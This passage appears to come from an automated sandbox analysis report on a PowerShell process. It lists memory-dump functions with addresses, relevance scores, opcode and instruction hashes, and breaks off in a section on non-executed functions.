              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q
              • API String ID: 0-1196845430
              • Opcode ID: 7157a5d0b84875c13037fe65864087b53ed3049038f0800f1baae926f3d972bf
              • Instruction ID: b468db0f96d9012156895e01698851800f4009ba4694d333d5d6183376116cae
              • Opcode Fuzzy Hash: 7157a5d0b84875c13037fe65864087b53ed3049038f0800f1baae926f3d972bf
              • Instruction Fuzzy Hash: 19B191B4A002099FCB24CF64C945B9EBBB2EF88344F15C469D905AF755CB31EC86CB91
              Function 077B0AB0 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q$$^q
              • API String ID: 0-831282457
              • Opcode ID: 0d5d822afbe93ec7428298bd09ada8b15a305577f8547a2e2886b648dfdccc2a
              • Instruction ID: e284973fbab4dbdad830844bc2b57e715df8cb9072dea38e25f73d40a4348385
              • Opcode Fuzzy Hash: 0d5d822afbe93ec7428298bd09ada8b15a305577f8547a2e2886b648dfdccc2a
              • Instruction Fuzzy Hash: 624148B2F002599FCB34AE799C007ABFBE5AF85654B24882AD805EB305DF31D945C7E1
              Function 077B0A90 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q
              • API String ID: 0-355816377
              • Opcode ID: 7267e00b39cead74b2afb98c48638a07a0f5fe32059c0b8576b4a2f9001214e5
              • Instruction ID: 3bf7ca6ccd036a47ab61f6503e9a75bc9a1588b902246eb3dd1ead55924010f0
              • Opcode Fuzzy Hash: 7267e00b39cead74b2afb98c48638a07a0f5fe32059c0b8576b4a2f9001214e5
              • Instruction Fuzzy Hash: 4B2103B6E042599FCB358E6488407EBBBF0AF46650B294867CC08EB202E7349C44C7E1
              Function 077B74CA Relevance: 1.7, Strings: 1, Instructions: 495COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l
              • API String ID: 0-603393540
              • Opcode ID: d4866ca8bb0197a072cd8bdf0ef1f60f1f6d27599bd1a2523984b04c18067ce8
              • Instruction ID: 0e79b944ee5d4064c3d79cc345476ae9b8ecdea30908cd38670b2e01ae700d07
              • Opcode Fuzzy Hash: d4866ca8bb0197a072cd8bdf0ef1f60f1f6d27599bd1a2523984b04c18067ce8
              • Instruction Fuzzy Hash: AE225CB4A10205AFD724CF58C585FA9BBB2BF89354F15C06AE805AF355CB72EC42CB91
              Function 077B7B2E Relevance: 1.7, Strings: 1, Instructions: 401COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (f*l
              • API String ID: 0-603393540
              • Opcode ID: 4e91d8f31ebdd5f943eeef73259e29bd5e8c92ea23622c90f3bbc17d03faab8c
              • Instruction ID: dd78e0497046a02aed1413178e8c4e968e4ba041886bceac904811d12d3e399d
              • Opcode Fuzzy Hash: 4e91d8f31ebdd5f943eeef73259e29bd5e8c92ea23622c90f3bbc17d03faab8c
              • Instruction Fuzzy Hash: ECF16DB4A10205AFD724CF98C581FA9BBB2BF85354F14C46AE905AF355CB72EC42CB91
              Function 077B87BC Relevance: 1.4, Strings: 1, Instructions: 138COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: 5a6ba647344da35f4dff26591d9374dc243d9d88c77c824541e73b0ec2cfb32d
              • Instruction ID: 5bcd0a176a5678682907c39ad42ea89566c2adb4f48bd63bf11559b412a430a4
              • Opcode Fuzzy Hash: 5a6ba647344da35f4dff26591d9374dc243d9d88c77c824541e73b0ec2cfb32d
              • Instruction Fuzzy Hash: 0441D2B0A142069FCF348E74C545BBA7BEAAF44290F1888B6D9059F251DB35EC45C7E3
              Function 048C3008 Relevance: .5, Instructions: 540COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f47ead893924940a38a459f28ce2fae8c32f0c0fba97740e14c12bd1622f2992
              • Instruction ID: f2d4fffac9e4e0adf68c116a313b4db56f06ea439d58a616896f8b9a61502a4b
              • Opcode Fuzzy Hash: f47ead893924940a38a459f28ce2fae8c32f0c0fba97740e14c12bd1622f2992
              • Instruction Fuzzy Hash: 40228D70A052489FCB06CF68D4949ADFBB1BF49310F25C69AE844EB366C735EC46CB90
              Function 048C46A0 Relevance: .3, Instructions: 344COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 577810c9ae3970114c143a78a228c66c1972f0498574124be290510acbae8674
              • Instruction ID: b5483ce5bb33a2644c93fec0a823a5470df7edcb43cbcd5845a5553692ea2e18
              • Opcode Fuzzy Hash: 577810c9ae3970114c143a78a228c66c1972f0498574124be290510acbae8674
              • Instruction Fuzzy Hash: 02E12634A002189FCB05CFA8D494A9DBBF2FF89714F248659E804EB365C731ED85CB90
              Function 048C39C8 Relevance: .3, Instructions: 320COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ab22bdaf4bbc4924f6dc709b2de25400260a1b6b25884f9c2c93c9644425726
              • Instruction ID: 887f7e0f21f145137589b4c6443f19cf1bb3f5dad44975d32e75761bb6ecc807
              • Opcode Fuzzy Hash: 7ab22bdaf4bbc4924f6dc709b2de25400260a1b6b25884f9c2c93c9644425726
              • Instruction Fuzzy Hash: 96D1E474A00209AFDB05CF98D584A9DBBB2FF88314F25C659E805EB365C735ED86CB90
              Function 048C9020 Relevance: .3, Instructions: 319COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05403cbe8e363cb8ea7e659036cd9bf226489641fe816ef594e7948710528b45
              • Instruction ID: a706a4dbd5c2b53c3fda1da48dd89b5bc8df969b0d3b803469ac8ae9b103c8bc
              • Opcode Fuzzy Hash: 05403cbe8e363cb8ea7e659036cd9bf226489641fe816ef594e7948710528b45
              • Instruction Fuzzy Hash: ACC1A271A00248DFCB14DFA8D544A9DBBB6FF88314F158A99E806DB365DB34ED49CB80
              Function 048CF49E Relevance: .3, Instructions: 277COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d9c61449a7accccd2c20abd4c70362946572ae6a372b2112547238ffc9bb469
              • Instruction ID: 290442431f6d87f8281134d83b4e2fbf5c2f88a7f48f07d16fdc411b6f30b979
              • Opcode Fuzzy Hash: 0d9c61449a7accccd2c20abd4c70362946572ae6a372b2112547238ffc9bb469
              • Instruction Fuzzy Hash: 64B12D70E002498FEB10CFA9C985BDDBBF2AF48314F148A2DD615E7294EB74E845CB91
              Function 048C8888 Relevance: .2, Instructions: 209COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ef69b9b011f712815b79829d31acc9fdf85bb2a670d5776012d70cf7814c1fd
              • Instruction ID: 799b9edeab82336fcaecb6fa779b57a0a609e3e64d7cd18b7e554ce04f0cac9c
              • Opcode Fuzzy Hash: 3ef69b9b011f712815b79829d31acc9fdf85bb2a670d5776012d70cf7814c1fd
              • Instruction Fuzzy Hash: F981AE30A012449FCB15DFA4D8849ADBBF2FF89315F1989A9E405DB361DB35EC85CB50
              Function 048C9956 Relevance: .2, Instructions: 188COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f6878a3248a02a1d34099b77cf5b7c7793ac8a1babcb25e240116d5eebeeacd0
              • Instruction ID: b5843fe2db33069ebd7f3719909f1840f43d4dd350c82e5bcffd199e7ed46849
              • Opcode Fuzzy Hash: f6878a3248a02a1d34099b77cf5b7c7793ac8a1babcb25e240116d5eebeeacd0
              • Instruction Fuzzy Hash: E8713B70A00258DFDB14DFA9D484AADBBF2FF88304F14896DD416AB290DB74EC86CB51
              Function 048CFAE5 Relevance: .2, Instructions: 180COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 016893046a56dc70bc4251c2ed51875aef9ff9461708a508b7f75ffe5189c17d
              • Instruction ID: bc1137664f4606e0c23e33cef00b72d04e757f4d74719fdf6580110bf0246a4f
              • Opcode Fuzzy Hash: 016893046a56dc70bc4251c2ed51875aef9ff9461708a508b7f75ffe5189c17d
              • Instruction Fuzzy Hash: B9716E71E00219DFEB10CFA9D8807DDBBF2AF48314F148929DA14E7294EB74A846CB91
              Function 048CFAF0 Relevance: .2, Instructions: 180COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 49fc0649624c6fc7eb591b0b58931a8a29d61129b85659461b80a72d6b582883
              • Instruction ID: 9fd18f5294eaa446b028bc633020c76bb00e5e106422dc4cfa74b4b39c86378d
              • Opcode Fuzzy Hash: 49fc0649624c6fc7eb591b0b58931a8a29d61129b85659461b80a72d6b582883
              • Instruction Fuzzy Hash: 01715171E00219DFEB14CFA9D84079DBBF2BF48314F14892DDA14E7294DB74A845CB91
              Function 048C9827 Relevance: .1, Instructions: 148COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e02945a07bc81eb23d00b25761e9e9ea2eda7ba4e69ff603ff7390b13c6b9b4d
              • Instruction ID: 8e69442bd395253d0a83a268adad20fea6d98c59d5adb98642a1c2d29d4f1c94
              • Opcode Fuzzy Hash: e02945a07bc81eb23d00b25761e9e9ea2eda7ba4e69ff603ff7390b13c6b9b4d
              • Instruction Fuzzy Hash: 90515A70A00249CFCB25CFA8D494A9EBBB2FF84314F14896ED4559B651DB75EC46CB80
              Function 077BA000 Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8bf39f47806c242bafd06f191004f5efd64f9f37fcb508aeef72e71af8eecc23
              • Instruction ID: f1cb40349a678a2e9737789e96619f7f011402101262011c296d8e2cde7e92c5
              • Opcode Fuzzy Hash: 8bf39f47806c242bafd06f191004f5efd64f9f37fcb508aeef72e71af8eecc23
              • Instruction Fuzzy Hash: 14413BF0A043069FCB31AF648901BE97BB2AFD13C0F1AC8A6D9059F252E735D946C761
              Function 048C9579 Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea4921d0683f83a39b1651c37d155e14e767f1f09466bba28a84b2bedf2bbe9c
              • Instruction ID: 20c168d3b69b2fde7adb9c05aa476f4d1f9138af1bbc041150140dc065ce03ef
              • Opcode Fuzzy Hash: ea4921d0683f83a39b1651c37d155e14e767f1f09466bba28a84b2bedf2bbe9c
              • Instruction Fuzzy Hash: 78416B71A002449FDB24DF74C958AAD7BF2EF89714F0585ACE406EB7A0DB38AC41CB90
              Function 048C3458 Relevance: .1, Instructions: 110COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db80ee878a44324732aecbf6fec6907641bb5736ed5ef39b87686151dd25f23d
              • Instruction ID: c912faa9bb87955c6432c851d14f313460a87e2c3df1d6aeef230fc6b8afb56c
              • Opcode Fuzzy Hash: db80ee878a44324732aecbf6fec6907641bb5736ed5ef39b87686151dd25f23d
              • Instruction Fuzzy Hash: 0F4139B4A006199FCB09CF59C5949BAFBB1FF48310B158A99D805AB364C736FC51CFA0
              Function 08466150 Relevance: .1, Instructions: 109COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2227450235.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_8460000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8bf066a5c8f956f7b16ccd13d0308514e2e51861d49808dbc04a796c3aa6f1f
              • Instruction ID: 01266b692bd92ff162a3ee8e211235cb6cc551f8ff20f6a43c78797f8b7c4886
              • Opcode Fuzzy Hash: d8bf066a5c8f956f7b16ccd13d0308514e2e51861d49808dbc04a796c3aa6f1f
              • Instruction Fuzzy Hash: 4D413A74E00209CFCB15CF99D5849AEBBB1FF88321B25866AD841AB364C731AC51CF90
              Function 077B706E Relevance: .1, Instructions: 102COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c870b693d4c0f58f5fba90dce89b7439476b5c6c5cb4c1e60ca97742860a149e
              • Instruction ID: 8da45f46f8d91f22dbcafb11197f43019392eaf4f7bc2648d0452fd19dc3d4ad
              • Opcode Fuzzy Hash: c870b693d4c0f58f5fba90dce89b7439476b5c6c5cb4c1e60ca97742860a149e
              • Instruction Fuzzy Hash: A6319574740208AFD7149BB8C955FAF7BA3AFC5340F108425E9026F795CE76AC468BD1
              Function 048C2B60 Relevance: .1, Instructions: 102COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d28b82c5b9ce38245e44e4808bac047db4fc6b580962ea06491c626499532412
              • Instruction ID: 7daf3107b627551663ec0aa506bd2f397e31e4dae214cc76baeee13337867fb5
              • Opcode Fuzzy Hash: d28b82c5b9ce38245e44e4808bac047db4fc6b580962ea06491c626499532412
              • Instruction Fuzzy Hash: 9C318F74A093958FC702DF6CD8A059ABFB0AF4A200B1584D7D484DB3A3C624E849C7A6
              Function 077B0E48 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d74aedf44192feaf191634511c395d61550a3dc9b5f1a3a89be32543223c5292
              • Instruction ID: f6d3486224186833c03140d0e221c81acc9c607dda9431c5906b52503123a4d4
              • Opcode Fuzzy Hash: d74aedf44192feaf191634511c395d61550a3dc9b5f1a3a89be32543223c5292
              • Instruction Fuzzy Hash: CC216EB171035AAFDB3469BE98447B7B6C99BC4791F14883AE505CB381CD75D845C360
              Function 048CC668 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 30655995e994e72f1e4bfc1bd364642f0699a7acc3f77d22c4fa149c057749eb
              • Instruction ID: 8cea13b9fbf1d24d7e28e23756d2cdbc53f58b22c20aed9f8d87cd9bf3eadaa7
              • Opcode Fuzzy Hash: 30655995e994e72f1e4bfc1bd364642f0699a7acc3f77d22c4fa149c057749eb
              • Instruction Fuzzy Hash: 4C310B30A011189FCB25DB64D958AEEB7F2BF89304F1445E9D50AAB351DB35EE81CF81
              Function 077B0E2C Relevance: .1, Instructions: 84COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fa53e23355e23aba1a62156ba6a769b6d856cd7b28caa15a3a4a0d0b046f617
              • Instruction ID: 482c74182e187cdef503a62537a2bbeef613cee5bb279835bdc443f6739142b5
              • Opcode Fuzzy Hash: 7fa53e23355e23aba1a62156ba6a769b6d856cd7b28caa15a3a4a0d0b046f617
              • Instruction Fuzzy Hash: 702178B1308399AFD7301AAA89057A3BB955F85750F18886BE544CF282D969D884C361
              Function 077B3054 Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 571de021dba921b71996efb8afa288267743ea83db56552d8bd0e2825dc911da
              • Instruction ID: ce276cc1056f82ef1a8dad8648491ce1f7405a8e80a20357d966892dd775add0
              • Opcode Fuzzy Hash: 571de021dba921b71996efb8afa288267743ea83db56552d8bd0e2825dc911da
              • Instruction Fuzzy Hash: A1219775B046059FC724CF18C884A66FBB6FFC5250B19C5AAD8198B252C732DC86CB51
              Function 048C39AD Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39e1beafd4868edea40efa8ad4fc285949ccd13747ad5c1143b2f749dc61ec19
              • Instruction ID: 782995467b5219a02aa5f7b2e8ed532fd37e27ad2151d61b302fdfd18e1513e9
              • Opcode Fuzzy Hash: 39e1beafd4868edea40efa8ad4fc285949ccd13747ad5c1143b2f749dc61ec19
              • Instruction Fuzzy Hash: DD312B74A046499FCB05CF58C5849AAFBF1FF49310B15859AD848EB762C335EC91CBA0
              Function 048C4691 Relevance: .1, Instructions: 68COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 558cd0ebfb48e125d06bff0bd51d1a0256df8fe030f9d93480fe5d7323efdcc2
              • Instruction ID: a79ed4fa38adbba7ba97c10a41d4bbb9f565f8af28b93c64805b2c6fece71fe1
              • Opcode Fuzzy Hash: 558cd0ebfb48e125d06bff0bd51d1a0256df8fe030f9d93480fe5d7323efdcc2
              • Instruction Fuzzy Hash: 7D21D874A002099FCB05CFA9C5909AEBBF1FF49310B258599D849EB765C735EC91CFA0
              Function 048C2B58 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c82a7f69c85e1f0411beb2a0afb7f28ae61043c8ebe23ff02dfa5a6b376ad515
              • Instruction ID: f16a6ae5539009cf2945b1d96222743e3aea98c3ca0a61e445e89af8911a4930
              • Opcode Fuzzy Hash: c82a7f69c85e1f0411beb2a0afb7f28ae61043c8ebe23ff02dfa5a6b376ad515
              • Instruction Fuzzy Hash: 6511F674A0424ADFCB00DF98D9849AEFBB5FF89310B148599E909AB352C731FD41CBA1
              Function 077B0C38 Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86502b78c71574040ce210452c782f3519bef9dda6ee62792ea83344988b4ab9
              • Instruction ID: 7b9a820118923be9dfbf501091d9f78c752826426fe55f8311749367c92a19a8
              • Opcode Fuzzy Hash: 86502b78c71574040ce210452c782f3519bef9dda6ee62792ea83344988b4ab9
              • Instruction Fuzzy Hash: 4301F77A3003169FC734596AD4006FBF7999BC56A2F14C83FD989CB651D772C849C760
              Function 048C398D Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 429f1fcd08a152823939c76f753e20915eace06d1a6af7e356bfabb0144f0e6e
              • Instruction ID: ac1a7337836d82e9085186b0e2482491bee8b1499c605a44389868e69003b586
              • Opcode Fuzzy Hash: 429f1fcd08a152823939c76f753e20915eace06d1a6af7e356bfabb0144f0e6e
              • Instruction Fuzzy Hash: 8E1125B1E042408FCB02CF58C840578FBB1FF8A304B158A9AC845DB662C336FC96CB90
              Function 048CF793 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c7cfce3a0aea148620db41e22804f2eebd3d64c3d0359a384c2eb3307a6c2eae
              • Instruction ID: c2b0ac5aa96cd149e7ce2834125d5ab4d91276b3045ea755192a1379ba9bbf31
              • Opcode Fuzzy Hash: c7cfce3a0aea148620db41e22804f2eebd3d64c3d0359a384c2eb3307a6c2eae
              • Instruction Fuzzy Hash: A0119930D50188DBEF24DB98D5947ECB7B2AB4531DF245A2EC201F61D0AB74A889CB12
              Function 0479D01D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216220258.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_479d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93a85ea04531680b702922b3bfb2a47e7fa01915690ef5ce68bd5ba3e93e0b89
              • Instruction ID: 59083c7f603b5859ea4acd252965da88dc02584d81bfa072352f8d38c019a7ac
              • Opcode Fuzzy Hash: 93a85ea04531680b702922b3bfb2a47e7fa01915690ef5ce68bd5ba3e93e0b89
              • Instruction Fuzzy Hash: 9B01D431109300AAEB204A2EED84767BFD8EF41364F08C929EC080A346D279AC41C6B1
              Function 0479D007 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216220258.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_479d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fcaad9aa8a1a159693500b27cd959088e4864df7c482a7814d5fc761df8f478c
              • Instruction ID: cbfb0c31d128fa68ea47b19eef0acc7c52788656836dd262ed56f2f9ab28f01c
              • Opcode Fuzzy Hash: fcaad9aa8a1a159693500b27cd959088e4864df7c482a7814d5fc761df8f478c
              • Instruction Fuzzy Hash: CC01527100E3C09ED7124B259C94756BFB4EF43224F1DC4CBD8888F2A3C2695845C772

              Non-executed Functions

              Function 0479D41C Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.2216220258.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_479d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ba24b70f9bf317f8ad26c992b551e90dbc5e2f6db2762c7b435f9d0cfdd69be4
              • Instruction ID: 0007ba083e38021e37befe8cc38efc40d6874d88c4b9fffb584d1d75f16e860a
              • Opcode Fuzzy Hash: ba24b70f9bf317f8ad26c992b551e90dbc5e2f6db2762c7b435f9d0cfdd69be4
              • Instruction Fuzzy Hash: DC21E271600200DFCF25DF14E984B26BFA5EB84324F24C569DD090A326C336F856C6A2
              Function 077BD395 Relevance: 19.0, Strings: 15, Instructions: 285COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$84(l$84(l$84(l$84(l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
